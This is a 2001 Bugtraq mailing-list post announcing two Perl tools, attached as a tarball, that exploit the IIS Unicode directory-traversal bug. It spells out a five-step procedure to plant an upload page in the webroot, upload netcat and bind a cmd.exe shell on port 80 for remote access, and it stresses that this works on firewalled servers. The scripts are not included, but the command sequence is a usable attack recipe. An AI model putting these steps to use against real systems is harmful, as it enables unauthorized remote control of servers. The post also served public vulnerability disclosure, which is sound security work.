Home page logo

bugtraq logo Bugtraq mailing list archives

shell on IIS server with Unicode using *only* HTTP
From: Roelof Temmingh <roelof () SENSEPOST COM>
Date: Thu, 25 Jan 2001 02:30:10 +0200

(assumes an IIS server vulnerable for the Unicode bug)

Tarball contains two PERL scripts:

1. Unicode upload creator (unicodeloader.pl)

 Works like this - two files (upload.asp and upload.inc - have
 them in the same dir as the PERL script) are build in the webroot
 (or anywhere else) using echo and some conversion strings.
 These files allows you to upload any file by
 simply surfing with a browser to the server.

 Typical use: (5 easy steps to a shell)
 1. Find the webroot (duh)
 2. perl unicodeloader target:80 'webroot'
 3. surf to target/upload.asp and upload nc.exe
 4. perl unicodexecute3.pl target:80 'webroot/nc -l -p 80 -e cmd.exe'
 5. telnet target 80

 Above procedure will drop you into a shell on the box
 without crashing the server (*winks at Eeye*).

 This procedure is nice for servers that are very tightly
 firewalled; servers that are not allowed to FTP, RCP or TFTP
 to the Internet.

2. Unicodexecute version3 (unicodexecute3.pl)
 same as before plus
 -includes searches for alternative executable dirs
 -more robust, stable than before
 -checks for access denied etc. added


Roelof W Temmingh               SensePost IT security
roelof () sensepost com         +27 83 448 6996

Attachment: unitools.tgz

  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]